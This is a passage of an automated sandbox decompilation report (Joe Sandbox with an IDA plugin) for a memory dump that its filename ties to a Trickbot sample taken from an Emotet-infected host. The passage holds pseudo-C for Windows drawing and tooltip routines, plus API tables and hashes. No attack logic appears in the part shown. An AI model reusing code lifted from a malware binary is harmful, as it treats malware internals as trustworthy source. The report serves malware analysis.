                          							__eflags =  *(_t456 - 0x78) -  *((intOrPtr*)(_t456 - 0x68)) -  *(_t456 - 0x70);
                          							if( *(_t456 - 0x78) <=  *((intOrPtr*)(_t456 - 0x68)) -  *(_t456 - 0x70)) {
                          								E004213CD(_t456 - 0x44, 6);
                          								asm("cdq");
                          								_t453 = _t453 + ( *((intOrPtr*)(_t456 - 0x68)) - _t453 - _t421 >> 1);
                          								__eflags = _t453;
                          							}
                          							GetTextMetricsA( *(_t456 - 0x3c), _t456 - 0xb8);
                          							InflateRect(_t456 - 0x70, 0, 1);
                          							asm("cdq");
                          							asm("sbb eax, eax");
                          							E00420FEF(GetSysColor(( ~( *( *((intOrPtr*)(_t456 - 0x50)) + 0xc4)) & 0x000000f6) + 0x13), _t456 - 0x44, _t302);
                          							E00420F37(_t456 - 0x44, 1);
                          							ExtTextOutA( *(_t456 - 0x40), _t453,  *((intOrPtr*)(_t456 - 0x6c)) + ( *(_t456 - 0x64) -  *((intOrPtr*)(_t456 - 0xac)) +  *((intOrPtr*)(_t456 - 0xb0)) +  *((intOrPtr*)(_t456 - 0xb4)) -  *((intOrPtr*)(_t456 - 0x6c)) + 1 - _t421 >> 1), 4, _t456 - 0x70,  *(_t456 - 0x10),  *( *(_t456 - 0x10) - 8), 0);
                          							__eflags =  *(_t456 - 0x18);
                          							if( *(_t456 - 0x18) != 0) {
                          								SelectObject( *(_t456 - 0x40),  *(_t456 - 0x18));
                          							}
                          							 *(_t456 - 4) = 3;
                          							E00417EC8(_t456 - 0x10);
                          						}
                          						__eflags =  *(_t456 - 0x2e) & 0x00000008;
                          						if(( *(_t456 - 0x2e) & 0x00000008) == 0) {
                          							L23:
                          							 *(_t456 - 0x24) =  *(_t456 - 0x64);
                          							L25:
                          							 *(_t456 - 0x58) = 0x43aed4;
                          							 *(_t456 - 4) = 9;
                          							E004217F5(_t456 - 0x58);
                          							 *((intOrPtr*)(_t456 - 0x60)) = 0x43aed4;
                          							 *(_t456 - 4) = 0xa;
                          							E004217F5(_t456 - 0x60);
                          							 *((intOrPtr*)(_t456 - 0x4c)) = 0x43aed4;
                          							 *(_t456 - 4) = 0xb;
                          						} else {
                          							E00420CA4(_t456 - 0x80);
                          							 *(_t456 - 4) = 5;
                          							asm("sbb eax, eax");
                          							_t267 = E00420D5B(_t456 - 0x80, CreateCompatibleDC( ~(_t456 - 0x44) &  *(_t456 - 0x40)));
                          							__eflags = _t267;
                          							if(_t267 != 0) {
                          								_t268 =  *0x44b734; // 0x0
                          								__eflags = _t268;
                          								if(_t268 == 0) {
                          									_t447 = 0;
                          									__eflags = 0;
                          								} else {
                          									_t447 = SelectObject( *(_t456 - 0x7c), _t268);
                          								}
                          								_t392 =  *0x44b72c; // 0x0
                          								_t420 =  *0x44b728; // 0x0
                          								asm("sbb eax, eax");
                          								BitBlt( *(_t456 - 0x40),  *(_t456 - 0x28),  *(_t456 - 0x24), _t420, _t392,  ~(_t456 - 0x80) &  *(_t456 - 0x7c), 0, 0, 0xcc0020);
                          								__eflags = _t447;
                          								if(_t447 != 0) {
                          									SelectObject( *(_t456 - 0x7c), _t447);
                          								}
                          								 *(_t456 - 4) = 3;
                          								E00420DC3(_t456 - 0x80);
                          								goto L23;
                          							} else {
                          								 *(_t456 - 4) = 3;
                          								E00420DC3(_t456 - 0x80);
                          								 *(_t456 - 0x58) = 0x43aed4;
                          								 *(_t456 - 4) = 6;
                          								E004217F5(_t456 - 0x58);
                          								 *((intOrPtr*)(_t456 - 0x60)) = 0x43aed4;
                          								 *(_t456 - 4) = 7;
                          								E004217F5(_t456 - 0x60);
                          								 *((intOrPtr*)(_t456 - 0x4c)) = 0x43aed4;
                          								 *(_t456 - 4) = 8;
                          							}
                          						}
                          					}
                          					E004217F5(_t456 - 0x4c);
                          					_t197 = _t456 - 4;
                          					 *_t197 =  *(_t456 - 4) | 0xffffffff;
                          					__eflags =  *_t197;
                          					_t239 = E0042161C(_t456 - 0x44,  *_t197);
                          				} else {
                          					_t239 = E004187B4(__ecx);
                          				}
                          				 *[fs:0x0] =  *((intOrPtr*)(_t456 - 0xc));
                          				return _t239;
                          			}

                          Instruction addresses (address column of the listing above, one entry per decompiled statement):
                          0x0042fbd2, 0x0042fbe2, 0x0042fbea, 0x0042fbed, 0x0042fbf9, 0x0042fbfd, 0x0042fc04, 0x0042fc0c, 0x0042fc16, 0x0042fc2c, 0x0042fc32, 0x0042fc3a, 0x0042fc45, 0x0042fc58, 0x0042fc5d, 0x0042fc61, 0x0042fc67, 0x0042fc73, 0x0042fc82, 0x0042fc87, 0x0042fc8b, 0x0042fc91, 0x0042fc9d, 0x0042fcac, 0x0042fcbd, 0x0042fcc4, 0x0042fccb, 0x0042fccd, 0x0042fccf, 0x0042fcd6, 0x0042fcd8, 0x0042fcf0, 0x0042fd05, 0x0042fd23, 0x0042fd2b, 0x0042fd30, 0x0042fd35, 0x0042fd38, 0x0042fd42, 0x0042fd44, 0x0042fd48, 0x0042fd4b, 0x0042fe33, 0x0042fd51, 0x0042fd59, 0x0042fd69, 0x0042fd76, 0x0042fd8e, 0x0042fdaa, 0x0042fdc6, 0x0042fdcb, 0x0042fddf, 0x0042fdf5, 0x0042fe0e, 0x0042fe27, 0x0042fe2c, 0x0042fe2f, 0x0042fe2f, 0x0042fe40, 0x0042fe40, 0x0042fe46, 0x0042fe4a, 0x004300d5, 0x00000000, 0x0042fe50, 0x0042fe56, 0x0042fe57, 0x0042fe58, 0x0042fe5d, 0x0042fe5e, 0x0042fe5f, 0x0042fe67, 0x0042fe7a, 0x0042fe8e, 0x0042fe99, 0x0042fea6, 0x0042febc, 0x0042fec1, 0x0042fec6, 0x0042fec8, 0x0042fed8, 0x0042fedb, 0x0042fee0, 0x0042feea, 0x0042feee, 0x0042feff, 0x0042ff08, 0x0042ff15, 0x0042ff18, 0x0042ff24, 0x0042ff27, 0x0042ff2e, 0x0042ff38, 0x0042ff3d, 0x0042ff3d, 0x0042ff3d, 0x0042ff49, 0x0042ff6c, 0x0042ff7b, 0x0042ff8d, 0x0042ff9b, 0x0042ffa5, 0x0042ffc4, 0x0042ffca, 0x0042ffce, 0x0042ffd6, 0x0042ffd6, 0x0042ffdf, 0x0042ffe3, 0x0042ffe3, 0x0042ffe8, 0x0042ffec, 0x004300bb, 0x004300be, 0x004300da, 0x004300df, 0x004300e5, 0x004300e9, 0x004300ee, 0x004300f4, 0x004300f8, 0x004300fd, 0x00430100, 0x0042fff2, 0x0042fff5, 0x0042fffd, 0x00430003, 0x00430013, 0x00430018, 0x0043001a, 0x00430057, 0x0043005c, 0x0043005e, 0x0043006e, 0x0043006e, 0x00430060, 0x0043006a, 0x0043006a, 0x00430070, 0x00430079, 0x00430086, 0x0043009b, 0x004300a1, 0x004300a3, 0x004300a9, 0x004300a9, 0x004300b2, 0x004300b6, 0x00000000, 0x0043001c, 0x0043001f, 0x00430023, 0x0043002d, 0x00430033, 0x00430037, 0x0043003c, 0x00430042, 0x00430046, 0x0043004b, 0x0043004e, 0x0043004e, 0x0043001a, 0x0042ffec, 0x00430107, 0x0043010c, 0x0043010c, 0x0043010c, 0x00430113, 0x0042fbef, 0x0042fbef, 0x0042fbef, 0x0043011e, 0x00430126

                          APIs
                          • __EH_prolog.LIBCMT ref: 0042FBD2
                          • GetWindowRect.USER32(?,?), ref: 0042FC16
                          • OffsetRect.USER32(?,?,?), ref: 0042FC2C
                          • GetSysColor.USER32(00000006), ref: 0042FC49
                          • CreateSolidBrush.GDI32(00000000), ref: 0042FC52
                          • GetSysColor.USER32(?), ref: 0042FC79
                          • CreateSolidBrush.GDI32(00000000), ref: 0042FC7C
                          • GetSysColor.USER32(?), ref: 0042FCA3
                          • CreateSolidBrush.GDI32(00000000), ref: 0042FCA6
                          • GetSystemMetrics.USER32(00000006), ref: 0042FCB9
                          • GetSystemMetrics.USER32(00000005), ref: 0042FCC0
                          • GetSystemMetrics.USER32(00000021), ref: 0042FCC7
                          • GetSystemMetrics.USER32(00000020), ref: 0042FCCD
                          • InflateRect.USER32(?,?,?), ref: 0042FD05
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: MetricsSystem$BrushColorCreateRectSolid$H_prologInflateOffsetWindow
                          • String ID:
                          • API String ID: 1266645593-0
                          • Opcode ID: 4689771b32c3087699ca03e68ee5b9b3cbbc650c2f83a260c541ee0f497bb8dd
                          • Instruction ID: 378bfe11a02023979f4e8295d435f0813c0490739259c6a0dfd4c2398b2b0c15
                          • Opcode Fuzzy Hash: 4689771b32c3087699ca03e68ee5b9b3cbbc650c2f83a260c541ee0f497bb8dd
                          • Instruction Fuzzy Hash: 17022972E00219AFDF11DBE4DD49EEEBBB9EF48304F14412AE501B7291DB74AA05CB64
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 88%
                          			E00412410(void* __eflags) {
                          				void* _t113;
                          				void* _t121;
                          				intOrPtr _t142;
                          				struct tagRECT _t144;
                          				int _t147;
                          				struct tagRECT _t158;
                          				intOrPtr _t160;
                          				long _t161;
                          				void* _t163;
                          				struct tagRECT* _t178;
                          				signed int _t180;
                          				int _t182;
                          				CHAR* _t183;
                          				long* _t184;
                          				intOrPtr _t194;
                          				struct tagRECT _t195;
                          				struct tagRECT _t198;
                          				intOrPtr _t199;
                          				int _t206;
                          				RECT* _t209;
                          				struct HDC__* _t210;
                          				void* _t213;
                          				void* _t214;
                          				void* _t215;
                          				void* _t216;
                          
                          				_t184 = _t214 + 0xc;
                          				_t209 =  *(_t214 + 0x34);
                          				_t180 = _t209->right;
                          				_push(0xf);
                          				_push(7);
                          				 *_t184 = _t209->left;
                          				_t210 =  *(_t214 + 0x40);
                          				_t184[1] = _t209->top;
                          				_t184[2] = _t180;
                          				_t184[3] = _t209->bottom;
                          				E00410920(_t210, _t209, 7);
                          				_t215 = _t214 + 0x14;
                          				InflateRect(_t214 + 0x30, 0xffffffff, 0xffffffff);
                          				if( *((short*)(_t215 + 0x44)) == 1 && IsWindowEnabled( *(_t215 + 0x30)) != 0) {
                          					_push(0xf);
                          					_push(7);
                          					E00410920(_t210, _t215 + 0x1c, 7);
                          					_t178 = _t215 + 0x30;
                          					_t215 = _t215 + 0x14;
                          					InflateRect(_t178, 0xffffffff, 0xffffffff);
                          				}
                          				PatBlt(_t210, _t209->left, _t209->top, 1, 1, 0xf00021);
                          				PatBlt(_t210, _t209->right - 1, _t209->top, 1, 1, 0xf00021);
                          				PatBlt(_t210,  *_t209, _t209->bottom - 1, 1, 1, 0xf00021);
                          				PatBlt(_t210, _t209->right - 1, _t209->bottom - 1, 1, 1, 0xf00021);
                          				asm("sbb ebx, ebx");
                          				_t182 =  ~_t180 + 1;
                          				if( *((intOrPtr*)(_t215 + 0x48)) == 0) {
                          					_t113 =  *0x44d384; // 0x0
                          				} else {
                          					_t113 =  *0x44d38c; // 0x0
                          				}
                          				 *((intOrPtr*)(_t215 + 0x14)) = SelectObject(_t210, _t113);
                          				PatBlt(_t210,  *(_t215 + 0x20),  *(_t215 + 0x20), _t182,  *((intOrPtr*)(_t215 + 0x2c)) -  *(_t215 + 0x24), 0xf00021);
                          				PatBlt(_t210,  *(_t215 + 0x28),  *(_t215 + 0x28),  *(_t215 + 0x24) -  *(_t215 + 0x20), _t182, 0xf00021);
                          				if( *((intOrPtr*)(_t215 + 0x48)) == 0) {
                          					_t163 =  *0x44d38c; // 0x0
                          					_t213 = 0;
                          					SelectObject(_t210, _t163);
                          					 *(_t215 + 0x28) =  *(_t215 + 0x28) - 1;
                          					 *(_t215 + 0x24) =  *(_t215 + 0x24) - 1;
                          					if(_t182 > 0) {
                          						do {
                          							PatBlt(_t210,  *(_t215 + 0x24),  *(_t215 + 0x30),  *(_t215 + 0x24) -  *(_t215 + 0x20) + 1, 1, 0xf00021);
                          							PatBlt(_t210,  *(_t215 + 0x28),  *(_t215 + 0x24), 1,  *(_t215 + 0x28) -  *(_t215 + 0x24), 0xf00021);
                          							if(_t182 - 1 > _t213) {
                          								InflateRect(_t215 + 0x1c, 0xffffffff, 0xffffffff);
                          							}
                          							_t213 = _t213 + 1;
                          						} while (_t182 > _t213);
                          					}
                          				}
                          				_t121 =  *0x44d388; // 0x0
                          				 *(_t215 + 0x1c) =  *(_t215 + 0x1c) + 1;
                          				 *(_t215 + 0x20) =  *(_t215 + 0x20) + 1;
                          				SelectObject(_t210, _t121);
                          				_t206 =  *(_t215 + 0x20);
                          				PatBlt(_t210, _t206,  *(_t215 + 0x24),  *((intOrPtr*)(_t215 + 0x2c)) -  *(_t215 + 0x24),  *(_t215 + 0x28) -  *(_t215 + 0x24), 0xf00021);
                          				if(IsWindowEnabled( *(_t215 + 0x30)) == 0) {
                          					_t161 =  *0x44d37c; // 0x0
                          					SetTextColor(_t210, _t161);
                          				}
                          				_t183 =  *(_t215 + 0x3c);
                          				_push(_t215 + 0x18);
                          				_push(_t215 + 0x14);
                          				E00410B10(_t210, _t183);
                          				_t216 = _t215 + 0x10;
                          				asm("cdq");
                          				 *((intOrPtr*)(_t216 + 0x20)) =  *((intOrPtr*)(_t216 + 0x20)) + ( *((intOrPtr*)(_t215 + 0x38)) -  *(_t215 + 0x30) -  *(_t215 + 0x28) - _t206 >> 1);
                          				_t194 =  *((intOrPtr*)(_t216 + 0x28));
                          				asm("cdq");
                          				 *(_t216 + 0x1c) =  *(_t216 + 0x1c) + ( *(_t216 + 0x24) -  *(_t216 + 0x1c) -  *((intOrPtr*)(_t216 + 0x14)) - _t206 >> 1);
                          				_t142 =  *((intOrPtr*)(_t216 + 0x20)) +  *((intOrPtr*)(_t216 + 0x18));
                          				if(_t142 >= _t194) {
                          					_t142 = _t194;
                          				}
                          				_t195 =  *(_t216 + 0x24);
                          				 *((intOrPtr*)(_t216 + 0x28)) = _t142;
                          				_t144 =  *(_t216 + 0x1c) +  *((intOrPtr*)(_t216 + 0x14));
                          				if(_t144 >= _t195) {
                          					_t144 = _t195;
                          				}
                          				 *(_t216 + 0x24) = _t144;
                          				if( *((intOrPtr*)(_t216 + 0x48)) != 0) {
                          					OffsetRect(_t216 + 0x1c, 1, 1);
                          					_t198 =  *(_t216 + 0x24);
                          					_t158 = _t209->right - 3;
                          					if(_t158 >= _t198) {
                          						_t158 = _t198;
                          					}
                          					_t199 =  *((intOrPtr*)(_t216 + 0x28));
                          					 *(_t216 + 0x24) = _t158;
                          					_t160 = _t209->bottom - 3;
                          					if(_t160 >= _t199) {
                          						_t160 = _t199;
                          					}
                          					 *((intOrPtr*)(_t216 + 0x28)) = _t160;
                          				}
                          				DrawTextA(_t210, _t183,  *(_t216 + 0x44), _t216 + 0x1c, 0x20);
                          				_t147 = GetFocus();
                          				if(_t147 ==  *((intOrPtr*)(_t216 + 0x30))) {
                          					InflateRect(_t216 + 0x1c, 1, 1);
                          					IntersectRect(_t216 + 0x24, _t216 + 0x1c, _t209);
                          					_t147 = DrawFocusRect(_t210, _t216 + 0x1c);
                          				}
                          				if( *(_t216 + 0x10) != 0) {
                          					return SelectObject(_t210,  *(_t216 + 0x10));
                          				}
                          				return _t147;
                          			}

                          Instruction addresses (address column of the listing above, one entry per decompiled statement):
                          0x00412413, 0x0041241a, 0x00412424, 0x00412427, 0x00412429, 0x0041242b, 0x00412432, 0x00412438, 0x0041243b, 0x0041243e, 0x00412441, 0x0041244a, 0x00412452, 0x0041245e, 0x00412473, 0x00412475, 0x0041247b, 0x00412480, 0x00412484, 0x0041248c, 0x0041248c, 0x004124a3, 0x004124bc, 0x004124d4, 0x004124ee, 0x004124f9, 0x004124fd, 0x00412503, 0x0041250c, 0x00412505, 0x00412505, 0x00412505, 0x00412526, 0x00412537, 0x00412557, 0x00412562, 0x00412564, 0x00412569, 0x0041256d, 0x00412573, 0x00412577, 0x0041257d, 0x0041257f, 0x0041259b, 0x004125bc, 0x004125c7, 0x004125d2, 0x004125d2, 0x004125d8, 0x004125d9, 0x0041257f, 0x0041257d, 0x004125dd, 0x004125e2, 0x004125e6, 0x004125ec, 0x00412603, 0x00412614, 0x00412627, 0x00412629, 0x00412630, 0x00412630, 0x0041263e, 0x00412642, 0x00412643, 0x00412646, 0x00412657, 0x0041265a, 0x00412660, 0x00412670, 0x00412674, 0x0041267a, 0x00412682, 0x00412688, 0x0041268a, 0x0041268a, 0x0041268c, 0x00412690, 0x00412698, 0x0041269e, 0x004126a0, 0x004126a0, 0x004126a7, 0x004126ab, 0x004126bc, 0x004126c1, 0x004126c5, 0x004126ca, 0x004126cc, 0x004126cc, 0x004126ce, 0x004126d2, 0x004126d9, 0x004126de, 0x004126e0, 0x004126e0, 0x004126e2, 0x004126e2, 0x004126f4, 0x00412700, 0x00412706, 0x00412711, 0x00412722, 0x0041272e, 0x0041272e, 0x00412739, 0x00000000, 0x00412741, 0x0041274e

                          APIs
                            • Part of subcall function 00410920: SetBkColor.GDI32(?), ref: 0041093D
                            • Part of subcall function 00410920: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0041098A
                            • Part of subcall function 00410920: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 004109B9
                            • Part of subcall function 00410920: SetBkColor.GDI32(?,?), ref: 004109D7
                            • Part of subcall function 00410920: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 00410A02
                            • Part of subcall function 00410920: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 00410A3C
                          • InflateRect.USER32(?,000000FF,000000FF), ref: 00412452
                          • IsWindowEnabled.USER32(?), ref: 00412465
                          • InflateRect.USER32(?,000000FF,000000FF), ref: 0041248C
                          • PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 004124A3
                          • PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 004124BC
                          • PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 004124D4
                          • PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 004124EE
                          • SelectObject.GDI32(?,00000000), ref: 00412513
                          • PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 00412537
                          • PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 00412557
                          • SelectObject.GDI32(?,00000000), ref: 0041256D
                          • PatBlt.GDI32(?,00000000,?,?,00000001,00F00021), ref: 0041259B
                          • PatBlt.GDI32(?,00000000,00000000,00000001,00000000,00F00021), ref: 004125BC
                          • InflateRect.USER32(?,000000FF,000000FF), ref: 004125D2
                          • SelectObject.GDI32(?,00000000), ref: 004125EC
                          • PatBlt.GDI32(?,00000000,?,?,?,00F00021), ref: 00412614
                          • IsWindowEnabled.USER32(?), ref: 0041261F
                          • SetTextColor.GDI32(?,00000000), ref: 00412630
                          • OffsetRect.USER32(?,00000001,00000001), ref: 004126BC
                            • Part of subcall function 00410920: SetBkColor.GDI32(?,00000000), ref: 00410A44
                          • DrawTextA.USER32(?,?,?,?,00000020), ref: 004126F4
                          • GetFocus.USER32 ref: 00412700
                          • InflateRect.USER32(?,00000001,00000001), ref: 00412711
                          • IntersectRect.USER32(?,?,?), ref: 00412722
                          • DrawFocusRect.USER32(?,?), ref: 0041272E
                          • SelectObject.GDI32(?,00000000), ref: 00412741
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Rect$Text$ColorInflateObjectSelect$DrawEnabledFocusWindow$IntersectOffset
                          • String ID:
                          • API String ID: 1611134597-0
                          • Opcode ID: f1fd01c642f9ca1cdb40d07b6b56d57805dc4f67ea3434bc45107149a5c7695c
                          • Instruction ID: 3959cfea75d29f1a651bd1824b073a1cdf01660b6b1f7102ba69d51d9cf7d654
                          • Opcode Fuzzy Hash: f1fd01c642f9ca1cdb40d07b6b56d57805dc4f67ea3434bc45107149a5c7695c
                          • Instruction Fuzzy Hash: D6B12771208206AFD704CF58CD89EABB7E8FB88714F004A1DF559D2290D7B5ED85CB6A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 96%
                          			E00416422(signed int __ecx) {
                          				signed int _t116;
                          				signed int _t119;
                          				signed int _t120;
                          				struct HWND__* _t124;
                          				signed int _t126;
                          				intOrPtr _t127;
                          				signed char _t141;
                          				signed int _t145;
                          				signed int _t149;
                          				signed int _t150;
                          				void* _t160;
                          				intOrPtr* _t167;
                          				signed int _t169;
                          				signed int _t182;
                          				signed int _t183;
                          				signed int _t186;
                          				signed int _t188;
                          				signed int _t198;
                          				void* _t200;
                          				signed short _t208;
                          				intOrPtr _t211;
                          				void* _t215;
                          				void* _t217;
                          				void* _t218;
                          				void* _t220;
                          				void* _t221;
                          
                          				_t116 = E00405340(E00438AF5, _t215);
                          				_t218 = _t217 - 0x74;
                          				_t167 =  *((intOrPtr*)(_t215 + 8));
                          				_t208 =  *(_t167 + 4);
                          				_t198 = __ecx;
                          				 *(_t215 - 0x10) = __ecx;
                          				 *(_t215 - 0x1c) = _t208;
                          				if(_t208 == 0x200 || _t208 == 0xa0 || _t208 == 0x202 || _t208 == 0x205 || _t208 == 0x208) {
                          					_t116 = GetKeyState(1);
                          					if(_t116 < 0) {
                          						L49:
                          						_t208 =  *(_t215 - 0x1c);
                          						goto L50;
                          					}
                          					_t116 = GetKeyState(2);
                          					if(_t116 < 0) {
                          						goto L49;
                          					}
                          					_t116 = GetKeyState(4);
                          					if(_t116 < 0) {
                          						goto L49;
                          					} else {
                          						_push( *_t167);
                          						L9:
                          						_t116 = E0041884D(_t215);
                          						if(_t116 != 0 && ( *(_t116 + 0x24) & 0x00000401) == 0) {
                          							_push(GetParent( *(_t116 + 0x1c)));
                          							goto L9;
                          						}
                          						__eflags = _t116 - _t198;
                          						if(_t116 == _t198) {
                          							_t211 = E00432D4E(0x44b2ec, E00430506);
                          							 *((intOrPtr*)(_t215 - 0x18)) = _t211;
                          							_t169 =  *(_t211 + 0xcc);
                          							_t119 = E00419E25(_t198);
                          							__eflags = _t169;
                          							 *(_t215 - 0x14) = _t119;
                          							if(_t169 == 0) {
                          								L19:
                          								_t120 = E0041BDEB(0x58);
                          								 *(_t215 - 0x1c) = _t120;
                          								_t169 = 0;
                          								__eflags = _t120;
                          								 *(_t215 - 4) = 0;
                          								if(__eflags != 0) {
                          									_t169 = E004160BF(_t120);
                          								}
                          								 *(_t215 - 4) =  *(_t215 - 4) | 0xffffffff;
                          								_push(1);
                          								_t116 = E00416114(_t169, __eflags,  *(_t215 - 0x14));
                          								__eflags = _t116;
                          								if(_t116 != 0) {
                          									SendMessageA( *(_t169 + 0x1c), 0x401, 0, 0);
                          									_t198 =  *(_t215 - 0x10);
                          									 *(_t211 + 0xcc) = _t169;
                          									L25:
                          									E00405360(_t215 - 0x54, 0, 0x2c);
                          									_t124 =  *(_t198 + 0x1c);
                          									_t220 = _t218 + 0xc;
                          									 *(_t215 - 0x4c) = _t124;
                          									 *(_t215 - 0x48) = _t124;
                          									 *(_t215 - 0x54) = 0x28;
                          									 *(_t215 - 0x50) = 1;
                          									_t126 = SendMessageA( *(_t169 + 0x1c), 0x408, 0, _t215 - 0x54);
                          									__eflags = _t126;
                          									if(_t126 == 0) {
                          										SendMessageA( *(_t169 + 0x1c), 0x404, 0, _t215 - 0x54);
                          									}
                          									_t127 =  *((intOrPtr*)(_t215 + 8));
                          									 *((intOrPtr*)(_t215 - 0x24)) =  *((intOrPtr*)(_t127 + 0x18));
                          									 *(_t215 - 0x28) =  *(_t127 + 0x14);
                          									ScreenToClient( *(_t198 + 0x1c), _t215 - 0x28);
                          									E00405360(_t215 - 0x80, 0, 0x2c);
                          									_t221 = _t220 + 0xc;
                          									 *(_t215 - 0x80) = 0x28;
                          									_t116 =  *((intOrPtr*)( *_t198 + 0x64))( *(_t215 - 0x28),  *((intOrPtr*)(_t215 - 0x24)), _t215 - 0x80);
                          									 *(_t215 - 0x1c) = _t116;
                          									asm("sbb ecx, ecx");
                          									_t182 =  ~(_t116 + 1) & _t198;
                          									__eflags =  *(_t211 + 0xd4) - _t116;
                          									 *(_t215 - 0x14) = _t182;
                          									if( *(_t211 + 0xd4) != _t116) {
                          										L33:
                          										__eflags = _t116 - 0xffffffff;
                          										if(_t116 == 0xffffffff) {
                          											SendMessageA( *(_t169 + 0x1c), 0x401, 0, 0);
                          											L42:
                          											E00416390(_t169,  *((intOrPtr*)(_t215 + 8)));
                          											__eflags =  *(_t211 + 0xd8) - 0x28;
                          											_t91 = _t211 + 0xd8; // 0xd8
                          											_t200 = _t91;
                          											if( *(_t211 + 0xd8) >= 0x28) {
                          												SendMessageA( *(_t169 + 0x1c), 0x405, 0, _t200);
                          											}
                          											 *(_t211 + 0xd0) =  *(_t215 - 0x14);
                          											 *(_t211 + 0xd4) =  *(_t215 - 0x1c);
                          											_t183 = 0xb;
                          											_t116 = memcpy(_t200, _t215 - 0x80, _t183 << 2);
                          											goto L45;
                          										}
                          										_t186 = 0xb;
                          										_t141 = memcpy(_t215 - 0x54, _t215 - 0x80, _t186 << 2);
                          										_t221 = _t221 + 0xc;
                          										_t188 =  *(_t215 - 0x10);
                          										 *(_t215 - 0x50) = _t141;
                          										__eflags =  *(_t188 + 0x24) & 0x00000400;
                          										if(( *(_t188 + 0x24) & 0x00000400) != 0) {
                          											_t150 = _t141 | 0x00000020;
                          											__eflags = _t150;
                          											 *(_t215 - 0x50) = _t150;
                          										}
                          										SendMessageA( *(_t169 + 0x1c), 0x404, 0, _t215 - 0x54);
                          										__eflags =  *(_t215 - 0x79) & 0x00000040;
                          										if(( *(_t215 - 0x79) & 0x00000040) != 0) {
                          											L38:
                          											SendMessageA( *(_t169 + 0x1c), 0x401, 1, 0);
                          											_t145 =  *(_t215 - 0x10);
                          											__eflags =  *(_t145 + 0x24) & 0x00000400;
                          											if(( *(_t145 + 0x24) & 0x00000400) != 0) {
                          												SendMessageA( *(_t169 + 0x1c), 0x411, 1, _t215 - 0x54);
                          											}
                          											SetWindowPos( *(_t169 + 0x1c), 0, 0, 0, 0, 0, 0x213);
                          											goto L41;
                          										} else {
                          											_t149 = E00419E69( *(_t215 - 0x10));
                          											__eflags = _t149;
                          											if(_t149 == 0) {
                          												L41:
                          												_t211 =  *((intOrPtr*)(_t215 - 0x18));
                          												goto L42;
                          											}
                          											goto L38;
                          										}
                          									} else {
                          										__eflags =  *(_t211 + 0xd0) - _t182;
                          										if( *(_t211 + 0xd0) != _t182) {
                          											goto L33;
                          										}
                          										__eflags =  *(_t198 + 0x25) & 0x00000004;
                          										if(( *(_t198 + 0x25) & 0x00000004) == 0) {
                          											__eflags = _t116 - 0xffffffff;
                          											if(_t116 != 0xffffffff) {
                          												_t116 = E00416390(_t169,  *((intOrPtr*)(_t215 + 8)));
                          											}
                          										} else {
                          											GetCursorPos(_t215 - 0x20);
                          											_t116 = SendMessageA( *(_t169 + 0x1c), 0x412, 0, ( *(_t215 - 0x1c) & 0x0000ffff) << 0x00000010 |  *(_t215 - 0x20) & 0x0000ffff);
                          										}
                          										L45:
                          										__eflags =  *((intOrPtr*)(_t215 - 0x5c)) - 0xffffffff;
                          										if( *((intOrPtr*)(_t215 - 0x5c)) != 0xffffffff) {
                          											__eflags =  *(_t215 - 0x60);
                          											if( *(_t215 - 0x60) == 0) {
                          												_t116 = E004053B8( *((intOrPtr*)(_t215 - 0x5c)));
                          											}
                          										}
                          										goto L78;
                          									}
                          								} else {
                          									__eflags = _t169;
                          									if(_t169 != 0) {
                          										_t116 =  *((intOrPtr*)( *_t169 + 4))(1);
                          									}
                          									goto L78;
                          								}
                          							}
                          							_t160 = E004043F9(_t169);
                          							__eflags = _t160 -  *(_t215 - 0x14);
                          							if(_t160 !=  *(_t215 - 0x14)) {
                          								 *((intOrPtr*)( *_t169 + 0x58))();
                          								 *((intOrPtr*)( *_t169 + 4))(1);
                          								_t169 = 0;
                          								__eflags = 0;
                          								 *(_t211 + 0xcc) = 0;
                          							}
                          							__eflags = _t169;
                          							if(_t169 != 0) {
                          								goto L25;
                          							} else {
                          								goto L19;
                          							}
                          						} else {
                          							__eflags = _t116;
                          							if(_t116 == 0) {
                          								_t116 = E00432D4E(0x44b2ec, E00430506);
                          								 *(_t116 + 0xd0) =  *(_t116 + 0xd0) & 0x00000000;
                          								 *(_t116 + 0xd4) =  *(_t116 + 0xd4) | 0xffffffff;
                          							}
                          							goto L78;
                          						}
                          					}
                          				} else {
                          					L50:
                          					__eflags =  *(_t198 + 0x24) & 0x00000401;
                          					if(( *(_t198 + 0x24) & 0x00000401) == 0) {
                          						L78:
                          						 *[fs:0x0] =  *((intOrPtr*)(_t215 - 0xc));
                          						return _t116;
                          					}
                          					_push( *_t167);
                          					while(1) {
                          						_t116 = E0041884D(_t215);
